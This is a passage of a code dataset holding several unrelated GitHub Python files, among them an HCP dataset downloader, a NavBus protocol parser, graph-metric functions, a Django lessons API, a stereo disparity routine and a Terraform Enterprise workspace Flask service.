{download_path}')\n\t\t\t\twith open(download_path, 'wb') as f:\n\t\t\t\t\twith tqdm(total=total_size, unit='iB', unit_scale=True) as pbar:\n\t\t\t\t\t\tfor data in response.iter_content(block_size):\n\t\t\t\t\t\t\tpbar.update(len(data))\n\t\t\t\t\t\t\tf.write(data)\n\n\t\tprint (f'Extracting files for {fname}')\n\n\t\tif 'tgz' in fname: #untar if tar file\n\t\t\ttar = tarfile.open(download_path, \"r:gz\")\n\t\t\ttar.extractall(path=download_dir)\n\t\t\ttar.close()\n\n\t\t\t#python doesn't have a strip components argument\n\t\t\t#reorganize dir\n\t\t\tsource = download_dir + '/' + fname.split('.')[0]\n\t\t\tdest = download_dir + '/'\n\n\t\t\tmerge_folders(source, dest)\n\t\t\tshutil.rmtree(source)\n\n\ndef merge_folders(root_src_dir, root_dst_dir):\n\t'''\n\n\tTaken from https://lukelogbook.tech/2018/01/25/merging-two-folders-in-python/\n\n\tSolves the problem shutil has w/ merging two dirs w/ same name\n\t\n\t'''\n\tfor src_dir, dirs, files in os.walk(root_src_dir):\n\t\tdst_dir = src_dir.replace(root_src_dir, root_dst_dir, 1)\n\t\tif not os.path.exists(dst_dir):\n\t\t\tos.makedirs(dst_dir)\n\t\tfor file_ in files:\n\t\t\tsrc_file = os.path.join(src_dir, file_)\n\t\t\tdst_file = os.path.join(dst_dir, file_)\n\t\t\tif os.path.exists(dst_file):\n\t\t\t\tos.remove(dst_file)\n\t\t\tshutil.copy(src_file, dst_dir)\n\ndef download_data(HCP_DIR=\"./hcp\", *argv):\n\t'''\n\n\tCreates the directory structure and downloads data of NMA preprocessed HCP dataset\n\tHCP_DIR\n\n\tArgs:\n\t\t- HCP_DIR (string): path to where data should be downloaded\n\t\t- *argv (string): can be any of ['rest', 'task, 'covariates']. If none are provided, downloads all possible sets\n\t'''\n\n\tdatasets = {'rest': ['hcp_rest.tgz', 'https://osf.io/bqp7m/download/'],\n\t\t'task': ['hcp_task.tgz', 'https://osf.io/s4h8j/download/'],\n\t\t'covariates': ['hcp_covariates.tgz', 'https://osf.io/x5p4g/download/'],\n\t\t'atlas': ['atlas.npz', 'https://osf.io/j5kuc/download']}\n\t\n\tif not os.path.isdir(HCP_DIR):\n\t os.mkdir(HCP_DIR)\n\n\tif not len(argv):\n\t\tdownload_preprocessed_hcp(datasets, HCP_DIR)\n\telse: #download a subset of the data based on the argument strings proviced\n\t\tdesired_datasets = {key: datasets[key] for key in argv}\n\t\tdownload_preprocessed_hcp(desired_datasets, HCP_DIR)\n\nif __name__ == \"__main__\":\n\n\tHCP_DIR = \"./hcp\"\n\tspecific_sets = sys.argv[1:]\n\tdownload_data(HCP_DIR, *specific_sets)","repo_name":"tlasmanbotch/macro-functional-organization","sub_path":"data_downloader.py","file_name":"data_downloader.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8830626499","text":"#!/usr/bin/env python\n\nimport argparse, pathlib\nfrom colorama import Fore, Back, Style\n\n# width=16 poly=0x1021 init=0xffff refin=true refout=true xorout=0x0000 check=0x6f91 residue=0x0000 name=\"CRC-16/MCRF4XX\"\nfrom crccheck.crc import Crc16Mcrf4Xx\n\nparser = argparse.ArgumentParser()\nparser.add_argument('filename', type=pathlib.Path, nargs='+') #type=argparse.FileType('r'))\nargs = parser.parse_args()\n\nframe_end = b'\\x71\\x01'\n\nfor filename in args.filename:\n with open(filename, 'rb') as logf:\n chunks = logf.read().split(frame_end)\n for chunk in chunks:\n if len(chunk)<1:\n break\n else:\n # re-attach the frame ending\n chunk += frame_end\n# print(\"\".join('{:02X}'.format(n) for n in chunk))\n\n state = 'unknown'\n subframe_len = 0\n subframe_n = 0\n subframe_type = 0\n c = 0x01\n stuffed = False\n inframe = False\n crcinst = Crc16Mcrf4Xx()\n\n for n in range(len(chunk)):\n prev_c = c\n c = chunk[n]\n\n # handle frame begin/end and byte stuffing\n if inframe == False:\n if c == 0x00 and prev_c == 0x71:\n inframe = True\n stuffed = False\n state = 'framestart'\n else:\n if c == 0x71:# and state != 'subframedata':\n if stuffed:\n prev_c = 0xff\n stuffed = False\n else:\n stuffed = True\n continue\n elif stuffed:# and state != 'subframedata':\n stuffed = False\n inframe = False\n state = 'unknown'\n if c == 0x01:\n # frame end\n state = 'frameend'\n print('{}{:02X}'.format(Fore.RED,prev_c), end='')\n if c == 0x00:\n # frame start, should not happen here\n pass\n print('{}{}{:02X}{}'.format(Fore.BLACK, Back.YELLOW,prev_c,Style.RESET_ALL))\n\n # frame/subframe states\n oldstate = state\n if state == 'framestart':\n print('{0}{1}{2}'.format(Fore.RED,'7100',Style.RESET_ALL), end='')\n state = 'subframelen'\n elif state == 'subframelen':\n subframe_len = int(c)\n crcinst.process([c])\n print('{}{:02X}'.format(Fore.YELLOW,c), end='')\n subframe_n = 0\n subframe_type = 0\n if subframe_len < 2:\n # TODO: do we need to check for correct offsets to next subframe?\n state = 'unknown'\n else:\n subframe_n = 1\n state = 'subframetype'\n elif state == 'subframetype':\n subframe_type = int(c)\n print('{}{:02X}'.format(Fore.CYAN,c), end='')\n crcinst.process([c])\n subframe_n += 1\n state = 'subframetstamp'\n elif state == 'subframetstamp':\n print('{}{:02X}'.format(Fore.MAGENTA,c), end='')\n crcinst.process([c])\n subframe_n += 1\n state = 'subframetstamp2'\n elif state == 'subframetstamp2':\n print('{:02X}{}'.format(c,Style.RESET_ALL), end='')\n crcinst.process([c])\n subframe_n += 1\n state = 'subframedata'\n elif state == 'subframedata':\n print('{:02X}'.format(c), end='')\n crcinst.process([c])\n if (subframe_n +3) < subframe_len:\n subframe_n += 1\n else:\n state = 'subframecrc'\n elif state == 'subframecrc':\n print('{}{:02X}'.format(Fore.GREEN,c), end='')\n crcinst.process([c])\n subframe_n += 1\n state = 'subframecrc2'\n elif state == 'subframecrc2':\n print('{:02X}{}'.format(c,Style.RESET_ALL), end='')\n crcinst.process([c])\n if crcinst.final() != 0:\n print(\"CRC error\")\n exit(1)\n else:\n crcinst.reset()\n subframe_n += 1\n state = 'subframelen'\n elif state == 'frameendlead':\n if c == 0x71:\n #print('{}{:02X}'.format(Fore.RED,c), end='')\n state = 'frameend'\n else:\n #print('{}{}{:02X}'.format(Fore.RED,Back.BLUE,c), end='')\n state = 'unknown'\n elif state == 'frameend':\n if c == 0x01:\n # frame complete\n pass\n print('{:02X}{}'.format(c, Style.RESET_ALL))\n state = 'unknown'\n inframe = False\n else:\n state = 'unknown'\n\n# print(hex(subframe_n) + \" \"+ hex(c) + \" \"+str(stuffed)+ \" \"+oldstate)\n\n\n\n\n","repo_name":"speters/_navbus-protokoll","sub_path":"nb.py","file_name":"nb.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74761499786","text":"from BML.transform.graph import Graph\nfrom BML.utils import timeFormat\nfrom BML.transform.nodes_features import *\n\nimport multiprocessing\nimport networkit as nk\nimport networkx as nx\n\nimport random\nimport time\nimport numpy as np\n\ndef avgNodes(function, *args):\n d = function(*args)\n return(np.mean([*d.values()]))\n\ndef nb_of_nodes(G, nodes):\n return(np.float64(len(G.nodes)))\n\ndef nb_of_edges(G, nodes):\n return(np.float64(len(G.edges)))\n\ndef diameter(G, nodes):\n return(np.float64(nx.diameter(G, usebounds=True)))\n\ndef assortativity(G, nodes):\n return(np.float64(nx.degree_assortativity_coefficient(G)))\n\ndef percolation_limit(G, nodes):\n degrees = np.array(list(degree(G, nodes).values()))\n k0 = np.sum(degrees/len(G))\n k02 = np.sum((degrees**2)/len(G))\n pl = 1 - 1/(k02/k0 -1)\n return(np.float64(pl))\n\ndef node_connectivity(G, nodes): # if ,too slow see approx\n return(np.float64(nx.node_connectivity(G)))\n\ndef edge_connectivity(G, nodes):\n return(np.float64(nx.edge_connectivity(G)))\n\ndef algebraic_connectivity(G, nodes, eigenvalues=None):\n laplacian_eigenvalues = None\n if(not eigenvalues is None):\n laplacian_eigenvalues = eigenvalues[\"laplacian\"]\n if(laplacian_eigenvalues is None):\n laplacian_eigenvalues = np.real(nx.laplacian_spectrum(G))\n \n laplacian_eigenvalues = np.delete(laplacian_eigenvalues, laplacian_eigenvalues.argmin())\n v = np.min(laplacian_eigenvalues)\n return(np.float64(v))\n\ndef largest_eigenvalue(G, nodes, eigenvalues=None):\n adjacency_eigenvalues = None\n if(not eigenvalues is None):\n adjacency_eigenvalues = eigenvalues[\"adjacency\"]\n if(adjacency_eigenvalues is None):\n adjacency_eigenvalues = np.real(nx.adjacency_spectrum(G))\n return(np.float64(max(adjacency_eigenvalues)))\n\ndef symmetry_ratio(G, nodes, eigenvalues=None):\n adjacency_eigenvalues = None\n if(not eigenvalues is None):\n adjacency_eigenvalues = eigenvalues[\"adjacency\"]\n if(adjacency_eigenvalues is None):\n adjacency_eigenvalues = np.real(nx.adjacency_spectrum(G))\n r = len(np.unique(adjacency_eigenvalues))/(diameter(G, nodes)+1)\n return(np.float64(r))\n\ndef natural_connectivity(G, nodes, eigenvalues=None):\n adjacency_eigenvalues = None\n if(not eigenvalues is None):\n adjacency_eigenvalues = eigenvalues[\"adjacency\"]\n if(adjacency_eigenvalues is None):\n adjacency_eigenvalues = np.real(nx.adjacency_spectrum(G))\n nc = np.log(np.mean(np.exp(adjacency_eigenvalues)))\n return(np.float64(nc))\n\ndef weighted_spectrum(G, nodes, n=3, eigenvalues=None):\n normalized_laplacian_eigenvalues = None\n if(not eigenvalues is None):\n normalized_laplacian_eigenvalues = eigenvalues[\"normalized_laplacian\"]\n if(normalized_laplacian_eigenvalues is None):\n normalized_laplacian_eigenvalues = np.real(nx.normalized_laplacian_spectrum(G))\n ws = np.sum((1-normalized_laplacian_eigenvalues)**n)\n return(np.float64(ws))\n\ndef effective_graph_resistance(G, nodes, eigenvalues=None):\n laplacian_eigenvalues = None\n if(not eigenvalues is None):\n laplacian_eigenvalues = eigenvalues[\"laplacian\"]\n if(laplacian_eigenvalues is None):\n laplacian_eigenvalues = np.real(nx.laplacian_spectrum(G))\n laplacian_eigenvalues = np.delete(laplacian_eigenvalues, laplacian_eigenvalues.argmin())\n nonzero_eigenvalues = laplacian_eigenvalues[np.nonzero(laplacian_eigenvalues)]\n nst = len(G)*np.sum(1/nonzero_eigenvalues)\n return(np.float64(nst))\n\ndef nb_spanning_trees(G, nodes, eigenvalues=None):\n laplacian_eigenvalues = None\n if(not eigenvalues is None):\n laplacian_eigenvalues = eigenvalues[\"laplacian\"]\n if(laplacian_eigenvalues is None):\n laplacian_eigenvalues = np.real(nx.laplacian_spectrum(G))\n laplacian_eigenvalues = np.delete(laplacian_eigenvalues, laplacian_eigenvalues.argmin())\n nonzero_eigenvalues = laplacian_eigenvalues[np.nonzero(laplacian_eigenvalues)]\n nst = np.prod(nonzero_eigenvalues/len(G))\n return(np.float64(nst))\n\nclass GraphFeatures(NodesFeatures):\n \n def __init__(self, primingFile, dataFile, params, outFolder, logFiles):\n \n self.params[\"use_networkit\"] = True\n self.params[\"all_nodes\"] = True\n self.params[\"nodes\"] = None\n self.params[\"exclude_features\"] = [] # Excluded by default\n self.params[\"include_features\"] = [\n 'degree', 'degree_centrality', 'average_neighbor_degree', 'node_clique_number', \n 'number_of_cliques', 'eigenvector', 'pagerank', 'clustering', 'triangles',\n 'nb_of_nodes', 'nb_of_edges', 'diameter', 'assortativity', 'percolation_limit', \n ]\n self.params[\"verbose\"] = False\n self.params[\"nbProcessFeatures\"] = multiprocessing.cpu_count()\n\n Graph.__init__(self, primingFile, dataFile, params, outFolder, logFiles)\n \n def getFeatures(self, G, nodes):\n \n features_nx, features_nk = NodesFeatures.getFeatures(self, G, nodes)\n \n for k,v in features_nx.items():\n features_nx[k] = (avgNodes,)+v\n for k,v in features_nk.items():\n features_nk[k] = (avgNodes,)+v\n \n self.eigenvalues={\n \"laplacian\":None,\n \"adjacency\":None,\n \"normalized_laplacian\":None,\n }\n \n features_nx[\"nb_of_nodes\"] = (nb_of_nodes, G, nodes)\n features_nx[\"nb_of_edges\"] = (nb_of_edges, G, nodes)\n features_nx[\"diameter\"] = (diameter, G, nodes)\n features_nx[\"assortativity\"] = (assortativity, G, nodes)\n features_nx[\"largest_eigenvalue\"] = (largest_eigenvalue, G, nodes, self.eigenvalues)\n features_nx[\"algebraic_connectivity\"] = (algebraic_connectivity, G, nodes, self.eigenvalues)\n features_nx[\"effective_graph_resistance\"] = (effective_graph_resistance, G, nodes, self.eigenvalues)\n features_nx[\"symmetry_ratio\"] = (symmetry_ratio, G, nodes, self.eigenvalues)\n features_nx[\"natural_connectivity\"] = (natural_connectivity, G, nodes, self.eigenvalues)\n features_nx[\"node_connectivity\"] = (node_connectivity, G, nodes)\n features_nx[\"edge_connectivity\"] = (edge_connectivity, G, nodes)\n features_nx[\"weighted_spectrum_3\"] = (weighted_spectrum, G, nodes, 3, self.eigenvalues)\n features_nx[\"weighted_spectrum_4\"] = (weighted_spectrum, G, nodes, 4, self.eigenvalues)\n features_nx[\"percolation_limit\"] = (percolation_limit, G, nodes)\n features_nx[\"nb_spanning_trees\"] = (nb_spanning_trees, G, nodes, self.eigenvalues)\n \n return(features_nx, features_nk)\n \n def computeFeatures(self, G, features_nx, features_nk):\n \n if(\"effective_graph_resistance\" in features_nx or \"nb_spanning_trees\" in features_nx or \"algebraic_connectivity\" in features_nx):\n if(self.params[\"verbose\"]):\n print(\"Computing laplacian_eigenvalues\")\n s = time.time()\n self.eigenvalues[\"laplacian\"] = np.real(nx.laplacian_spectrum(G))\n if(self.params[\"verbose\"]):\n print(\"Finish laplacian_eigenvalues (%s)\" % (timeFormat(time.time()-s)))\n \n if(\"largest_eigenvalue\" in features_nx or \"symmetry_ratio\" in features_nx or \"natural_connectivity\" in features_nx):\n if(self.params[\"verbose\"]):\n print(\"Computing adjacency_eigenvalues\")\n s = time.time()\n self.eigenvalues[\"adjacency\"] = np.real(nx.adjacency_spectrum(G))\n if(self.params[\"verbose\"]):\n print(\"Finish adjacency_eigenvalues (%s)\" % (timeFormat(time.time()-s)))\n \n if(\"weighted_spectrum_3\" in features_nx or \"weighted_spectrum_4\" in features_nx):\n if(self.params[\"verbose\"]):\n print(\"Computing normalized_laplacian_eigenvalues\")\n s = time.time()\n self.eigenvalues[\"normalized_laplacian\"] = np.real(nx.normalized_laplacian_spectrum(G))\n if(self.params[\"verbose\"]):\n print(\"Finish normalized_laplacian_eigenvalues (%s)\" % (timeFormat(time.time()-s)))\n \n return(NodesFeatures.computeFeatures(self, G, features_nx, features_nk))\n\n ","repo_name":"KevinHoarau/BML","sub_path":"BML/transform/graph_features.py","file_name":"graph_features.py","file_ext":"py","file_size_in_byte":8253,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"11813806903","text":"def prime_check2(n):\r\n\t#initial easy checks for 2 and 3\r\n\tif n == 2:\r\n\t\treturn True\r\n\tif n == 3:\r\n\t\treturn True\r\n\tif n % 2 == 0:\r\n\t\treturn False\r\n\tif n % 3 == 0:\r\n\t\treturn False\r\n\r\n\t#used to check 6k +/- 1 for sqrt(n)\r\n\r\n\tstep = 4\r\n\troot_n = int(n ** 0.5)+1\r\n\ti = 5\r\n\t\r\n\twhile i < root_n:\r\n\t\tif n % i == 0:\r\n\t\t\treturn False\r\n\t\tstep = 6 - step\r\n\t\ti += step\r\n\t\t#print(i)\r\n\t\t\r\n\treturn True\r\n\r\ndef nth_prime(n):\r\n\t#i counts nth prime number\r\n\ti = 1\r\n\t#j counts all numbers\r\n\tj = 2\r\n\twhile i < n:\r\n\t\t#print(i, j)\r\n\t\tj += 1\r\n\t\tif prime_check2(j):\r\n\t\t\t#print(j)\r\n\t\t\ti += 1\r\n\treturn j\r\n\r\nprint(nth_prime(10_001))","repo_name":"bk2coady/ProjectEuler","sub_path":"ProjectEulerS7.py","file_name":"ProjectEulerS7.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2333192424","text":"import numpy as pb\nimport cv2\n\n\ndef Search(column, window, width):\n range = 75\n padding = window // 2\n right_bound = column\n left_bound = column - range\n if left_bound < padding:\n left_bound = padding\n step = 1\n return left_bound, right_bound, step\n\n\ndef Pad(ipbut, padding):\n rows = ipbut.shape[0]\n columns = ipbut.shape[1]\n output = pb.zeros((rows + padding * 2, columns + padding * 2), dtype=float)\n output[padding: rows + padding, padding: columns + padding] = ipbut\n return output\n\n\ndef DisparityMap(left, right, window):\n padding = window // 2\n left_img = Pad(left, padding)\n right_img = Pad(right, padding)\n height, width = left_img.shape\n d_map = pb.zeros(left.shape, dtype=float)\n for row in range(height - window + 1):\n for col in range(width - window + 1):\n bestdist = float('inf')\n shift = 0\n left_pixel = left_img[row:row + window, col:col + window]\n l_bound, r_bound, step = Search(\n col, window, width)\n for i in range(l_bound, r_bound, step):\n right_pixel = right_img[row:row + window, i:i + window]\n ssd = pb.sum((left_pixel - right_pixel) ** 2)\n if ssd < bestdist:\n bestdist = ssd\n shift = i\n d_map[row, col] = col - shift\n disparity_SGBM = cv2.normalize(d_map, d_map, alpha=255,\n beta=0, norm_type=cv2.NORM_MINMAX)\n disparity_SGBM = pb.uint8(disparity_SGBM)\n return d_map,disparity_SGBM\n","repo_name":"prat1kbhujbal/Stereo_Depth_Estimation","sub_path":"code/correspondence.py","file_name":"correspondence.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"32970458014","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import viewsets\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\n\nfrom api.permissions import IsOwnerUser\n\nfrom courses.models import Lesson\nfrom api.serializers.lessons import (\n LessonListSerializer,\n LessonDetailSerializer,\n LessonCreateSerializer\n)\n\n\nclass LessonViewSet(viewsets.ViewSet):\n\n def get_permissions(self):\n if self.action in ['update']:\n return [IsOwnerUser()]\n elif self.action in ['retrieve']:\n return [AllowAny(), ]\n return super(LessonViewSet, self).get_permissions()\n\n def list(self, request, pk):\n queryset = Lesson.objects.filter(course__id=pk)\n serializer = LessonListSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def create(self, request):\n current_user = self.request.user\n serializer = LessonCreateSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save(created_by=current_user, updated_by=current_user)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Lesson.objects.all()\n lesson = get_object_or_404(queryset, pk=pk)\n serializer = LessonDetailSerializer(lesson)\n return Response(serializer.data)\n\n def update(self, request, pk=None):\n current_user = self.request.user\n queryset = Lesson.objects.all()\n lesson = get_object_or_404(queryset, pk=pk)\n self.check_object_permissions(self.request, lesson)\n\n serializer = LessonDetailSerializer(\n instance=lesson,\n data=request.data\n )\n serializer.is_valid(raise_exception=True)\n serializer.save(updated_by=current_user)\n return Response(serializer.data)\n","repo_name":"TimBerk/university","sub_path":"api/views/lessons.py","file_name":"lessons.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40436466847","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom ckeditor.fields import RichTextField\nimport datetime\n\nclass LastLogin(models.Model):\n lastLoginTime = models.DateTimeField(null=True)\n user = models.OneToOneField(User, on_delete=models.CASCADE, null=True)\n\nclass Project(models.Model):\n\n projectName = models.TextField()\n\n # lastnik projekta\n product_owner = models.ForeignKey(User, on_delete=models.CASCADE, related_name='product_owner')\n\n # skrbnik metodologije\n scrum_master = models.ForeignKey(User, on_delete=models.CASCADE, related_name='scrum_master')\n\n description = models.TextField()\n\n documentation = RichTextField(blank=True, null=True)\n\n def getStories(self):\n return Story.objects.filter(project_id=self)\n\n def getDevTeamMembers(self):\n return DevTeamMember.objects.filter(projectId_id=self)\n\n def getPosts(self):\n return Post.objects.filter(project_id=self).order_by('-time_posted')\n\n \n \n stories = property(getStories)\n\n# dev team member without any special role\nclass DevTeamMember(models.Model):\n\n userId = models.ForeignKey(User, on_delete=models.CASCADE)\n\n projectId = models.ForeignKey(Project, on_delete=models.CASCADE)\n\n def getProjects(self):\n return Project.objects.filter(id=self)\n\n projects = property(getProjects)\n\nclass Sprint(models.Model):\n\n start = models.DateField()\n\n end = models.DateField()\n\n expectedSpeed = models.IntegerField()\n\n project = models.ForeignKey(Project, on_delete=models.CASCADE)\n\nclass Story(models.Model):\n\n name = models.TextField()\n\n description = models.TextField()\n\n # possible values: 'must have', 'should have', 'could have', 'won't have'\n priority = models.TextField()\n\n businessValue = models.IntegerField()\n\n # casovna zahtevnost\n timeCost = models.DecimalField(max_digits=5, decimal_places=2, null=True)\n\n timeSpent = models.DecimalField(max_digits=5, decimal_places=2, null=True)\n\n comment = models.TextField(null=True)\n\n # 'new', 'in progress', 'done', 'accepted', 'rejected', 'incomplete'\n developmentStatus = models.TextField()\n\n project = models.ForeignKey(Project, on_delete=models.CASCADE)\n\n # do we need to save the state as was after the sprint comlpetion or can we rewire to new sprint in case of rejection\n sprint = models.ForeignKey(Sprint, on_delete=models.CASCADE, null=True)\n\n def getTasks(self):\n return Task.objects.filter(story_id=self)\n\n tasks = property(getTasks)\n\nclass Task(models.Model):\n\n story = models.ForeignKey(Story, on_delete=models.CASCADE)\n\n # koliko je še do zaključka\n timeCost = models.DecimalField(max_digits=5, decimal_places=2, null=True)\n\n description = models.TextField()\n\n assignedUser = models.ForeignKey(User, on_delete=models.CASCADE, null=True)\n\n # accepted, rejected, pending, free\n userConfirmed = models.TextField()\n\n done = models.BooleanField(default=False)\n\n def getTimeSpent(self):\n return TimeSpent.objects.filter(task_id=self)\n\n def getTimeSpentSum(self):\n seconds = sum([time_spent.time_spent for time_spent in TimeSpent.objects.filter(task_id=self)])\n return datetime.timedelta(seconds=seconds)\n\n timeSpent = property(getTimeSpent)\n\n timeSpentSum = property(getTimeSpentSum)\n\nclass TimeSpent(models.Model):\n\n task = models.ForeignKey(Task, on_delete=models.CASCADE)\n\n time_spent = models.IntegerField(null=True)\n\n startedWorkingOn = models.DateTimeField(null=True)\n\n date = models.DateField()\n\nclass Post(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n\n description = models.TextField()\n\n time_posted = models.DateTimeField()\n\n project = models.ForeignKey(Project, on_delete=models.CASCADE)\n","repo_name":"mrWhoop/SMRPO-scrum-app","sub_path":"scrum/scrum_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8612107115","text":"f = open('27-73a.txt')\nn = int(f.readline())\na = [int(x) for x in f]\nmaxs = 0\nfor i in range(n):\n s = 0\n for j in range(i, n):\n s += a[j]\n if s % 93 == 0 and s % 2 != 0 and s > maxs:\n maxs = s\nprint(maxs)\n\n# f = open('27-73b.txt')\n# n = int(f.readline())\n# maxs = 0\n# s = 0\n# mini = [10**20]*93\n# for i in range(n):\n# x = int(f.readline())\n# s += x\n# if s % 93 == 0 and s % 2 != 0: maxs = max(maxs, s)\n# s1 = s - mini[s % 93 and not s % 2]\n# maxs = max(maxs, s1)\n# mini[s % 93 and not s % 2] = min(mini[s % 93 and not s % 2], s)\n# print(maxs)","repo_name":"Bormotoon/SolvingEGE","sub_path":"FIPI Demo - March 2023/27_4279_Поляков_Пара_любые числа.py","file_name":"27_4279_Поляков_Пара_любые числа.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22003639887","text":"import matplotlib.pyplot as plt\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.cluster import KMeans, DBSCAN\nfrom sklearn.tree import DecisionTreeClassifier, export_graphviz\nimport pydotplus\n\nimport numpy as np\nfrom sklearn.tree import _tree\n\nfrom sklearn.manifold import TSNE\n# X为样本特征,Y为样本簇类别,共1000个样本,每个样本2个特征,对应x和y轴,共4个簇,\n# 簇中心在[-1,-1], [0,0],[1,1], [2,2], 簇方差分别为[0.4, 0.2, 0.2]\n# X, y = make_blobs(n_samples=1000, n_features=2, centers=[[0, 0], [2, 2]],\n# cluster_std=[0.2, 0.2], random_state=9)\n\ndef try3(tree, feature_names):\n tree_ = tree.tree_\n print(tree_.value)\n feature_name = [feature_names[i]\n if i != _tree.TREE_UNDEFINED else \"undefined!\"\n for i in tree_.feature]\n print(\"def tree({}):\".format(\", \".join(feature_names)))\n\n def recurse(node, depth):\n indent = \" \" * depth\n if tree_.feature[node] != _tree.TREE_UNDEFINED:\n\n name = feature_name[node]\n threshold = tree_.threshold[node]\n print(\"{}if {} <= {}:\".format(indent, name, threshold))\n recurse(tree_.children_left[node], depth + 1)\n print(\"{}else: # if {} > {}\".format(indent, name, threshold))\n recurse(tree_.children_right[node], depth + 1)\n else:\n print(\"{}return {}\".format(indent, np.argmax(tree_.value[node])))\n\n recurse(0, 1)\n\n\np = r'lucky2.txt'\nwith open(p,encoding = 'utf-8') as f:\n data = np.loadtxt(f,delimiter = \",\")\ny_Kmeans= KMeans(n_clusters=2, random_state=9).fit_predict(data)\n\n# y_Kmeans= DBSCAN(eps=0.5,min_samples=2).fit_predict(data)\nplt.scatter(data[:, 0], data[:, 1], c=y_Kmeans)\nplt.show()\ndtc = DecisionTreeClassifier(criterion='entropy',max_depth=2) #建立决策树对象\ndtc.fit(data, y_Kmeans) # 决策树拟合\ny_tree = dtc.predict(data)\nplt.scatter(data[:, 0], data[:, 1], c=y_tree)\nplt.show()\n\ntry3(dtc,['x1','x2','x3'])\ndot_data = export_graphviz(dtc,out_file=None,filled=True,rounded=True,special_characters=True)\ngraph = pydotplus.graph_from_dot_data(dot_data)\ngraph.write_png(\"tree2.png\")\n\n","repo_name":"KongSoft/VisDemo","sub_path":"Vis/KmeansTest2.py","file_name":"KmeansTest2.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14689742399","text":"\"\"\"\nGiven the array nums consisting of 2n elements in the form [x1,x2,...,xn,y1,y2,...,yn].\n\nReturn the array in the form [x1,y1,x2,y2,...,xn,yn].\n\"\"\"\n\n\nclass Solution:\n def shuffle(self, nums: List[int], n: int) -> List[int]:\n mid = abs(len(nums) / 2)\n i = 0\n j = int(mid)\n out = []\n \n while i < int(mid):\n out.append(nums[i])\n out.append(nums[j])\n i += 1\n j += 1\n \n return out","repo_name":"yaelBrown/pythonSandbox","sub_path":"LC/LC1470-ShuffleTheArray.py","file_name":"LC1470-ShuffleTheArray.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71117442506","text":"#! /usr/bin/env python\nimport os\nimport subprocess\nimport pyterprise\nfrom flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom subprocess import run\nfrom subprocess import Popen, PIPE\nfrom subprocess import check_output\n\ntfe_token = \"\"\naws_access_key_id = \"\"\naws_secret_access_key = \"\"\nclient = pyterprise.Client()\n\n# Supply your token as a parameter and the url for the terraform enterprise server.\n# If you are not self hosting, use the one provided by hashicorp.\nclient.init(token=tfe_token, url='https://ptfe.servian-sg.gradeous.io')\n\ndef create_workspace(payload):\n vcs_options = {\n \"identifier\": \"ntwairay/rich-value-type-test\",\n \"oauth-token-id\": \"ot-wfuy8qmxZV8oEpvW\",\n \"branch\": \"master\",\n \"default-branch\": False\n }\n org = client.set_organization(id=payload['id'])\n org.create_workspace(name=payload['name'],\n vcs_repo=vcs_options,\n auto_apply=False,\n queue_all_runs=False,\n working_directory='/',\n trigger_prefixes=['/'])\n workspace = org.get_workspace(payload['name'])\n workspace.create_variable(key='AWS_ACCESS_KEY_ID', value=aws_access_key_id, sensitive=True, category='terraform')\n workspace.create_variable(key='AWS_SECRET_ACCESS_KEY', value=aws_secret_access_key, sensitive=True, category='terraform')\n return \"

Onboarding is completed

\"\n\ndef create_plan(payload):\n org = client.set_organization(id=payload['id'])\n workspace = org.get_workspace(payload['name'])\n workspace.plan_apply(destroy_flag=False,message=\"run from api\")\n return \"

Plan and apply are completed

\"\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/')\ndef index():\n return \"

You are using PTFE API

\"\n\n@app.route(\"/health\")\ndef health():\n return jsonify({\"status\": \"UP\"}), 200\n\n@app.route('/createworkspace', methods=['POST'])\ndef createworkspace():\n payload = request.get_json()\n return create_workspace(payload)\n\n@app.route('/createplan', methods=['POST'])\ndef createwplan():\n payload = request.get_json()\n return create_plan(payload)\n\nif __name__ == '__main__':\n app.run(debug=False, host='0.0.0.0')\n","repo_name":"ntwairay/pyterpriser","sub_path":"src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30892814907","text":"import os\nimport logging\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom typing import Tuple\n\nfrom ml.models.model import Model\nfrom sklearn.manifold import TSNE\n\nclass TSNEClassifier(Model):\n \"\"\"This class implements a TSNE\n Args:\n Model (Model): inherits from the model class\n \"\"\"\n \n def __init__(self, settings:dict):\n super().__init__(settings)\n self._name = 'TSNE'\n self._notation = 'tsne'\n self._model_settings = settings['ML']['models']['classifiers']['tsne']\n self._fold = 0\n \n def _format(self, x:list, y:list) -> Tuple[list, list]:\n return [xx for xx in x], [yy for yy in y]\n \n def _format_features(self, x:list) 